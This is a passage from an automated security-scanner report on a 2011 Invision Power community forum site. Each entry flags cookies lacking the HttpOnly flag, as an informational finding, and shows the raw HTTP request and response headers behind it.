Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8fa107cfdd9dcbc7f70424ba74fe3841; path=/; domain=community.invisionpower.com; httponly
Location: http://community.invisionpower.com/
Set-Cookie: cforums_itemMarking_forums=eJxLtDK0qi62MrNSSi9KLU4tUbJOBIlkWhlaA7GRpZmZhbmJgZF1bS1cMA0eDB0%2C; expires=Thu, 02-Feb-2012 22:56:42 GMT; path=/; domain=community.invisionpower.com
Content-Length: 0
Connection: close
Content-Type: text/html


11.240. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26a6b17494dde8cfa26a90ef195a3c6d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmlobmBmbWtVwwUA4GMg%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34380

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

11.241. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=23b36da2676ec4b7a7eada851882031e; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNDQ3NLauBVwwVbgGYg%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33618

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

11.242. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52c21975d801317348f94128ddfa4737; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmlobmBubWtVwwUCEGNA%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33840

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

11.243. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=7e18e83c9fce99cef40adc0b7151471b; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNDQ3MLOuBVwwVf8GaA%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30617

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...

11.244. http://community.invisionpower.com/topic/330933-iptracker-200-released/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330933-iptracker-200-released/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/330933-iptracker-200-released/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:32:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=45f53a2266583fb4f8e904d5b2e5a444; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Wed, 03-Feb-2010 00:32:08 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:32:10 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDKyqs60MjY2sDQ3tM60MjSyNDOzMDU1NrGGiBobw0QtjQ2NLKxrATjzDAQ%2C; expires=Fri, 03-Feb-2012 00:32:10 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 65670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.245. http://community.invisionpower.com/topic/330971-ipnexus-113-released/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/330971-ipnexus-113-released/ HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=43d91def85f9f8cd34cf68ed9cc395a3; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:12:52 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:55 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzsDA2N7auBVwwaIcHBw%2C%2C; expires=Thu, 02-Feb-2012 23:12:55 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.246. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/page__pid__2073390

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/330971-ipnexus-113-released/page__pid__2073390 HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568; cforums_session_id=8d464692f5305d92adc7b346c33d132b

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 22:25:33 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:25:34 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Thu, 02-Feb-2012 22:25:34 GMT; path=/; domain=community.invisionpower.com
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.247. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__findpost__p__2073390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/page__view__findpost__p__2073390

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/330971-ipnexus-113-released/page__view__findpost__p__2073390 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 00:28:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=5e770128339427aeed48c7e2e75632f4; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Wed, 03-Feb-2010 00:28:35 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__p__2073390#entry2073390
Content-Length: 0
Connection: close
Content-Type: text/html


11.248. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/330971-ipnexus-113-released/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:25:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 22:25:32 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390#entry2073390
Content-Length: 0
Content-Type: text/html


11.249. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/330971-ipnexus-113-released/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=2030001c43ffea8710e90fd8e957e047; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:17 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390#entry2073390
Content-Length: 0
Connection: close
Content-Type: text/html


11.250. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__view__new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/page__view__new

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/330971-ipnexus-113-released/page__view__new HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 00:28:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=eb8c6d7b24472ec2b0ee209dc8be258a; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Wed, 03-Feb-2010 00:28:39 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:28:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 28986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.251. http://community.invisionpower.com/topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getlastpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getlastpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getlastpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=9f151eb093c784a4a314e4fa6a9bcbe0; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modpids=deleted; expires=Tue, 02-Feb-2010 23:13:50 GMT; path=/; domain=community.invisionpower.com
Location: http://community.invisionpower.com/topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__pid__2075908__st__60#entry2075908
Content-Length: 0
Connection: close
Content-Type: text/html


11.252. http://community.invisionpower.com/topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getnewpost  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getnewpost

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getnewpost HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 23:13:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=99bbc071bb7b7e4b0721a21ebdacd78f; path=/; domain=community.invisionpower.com; httponly
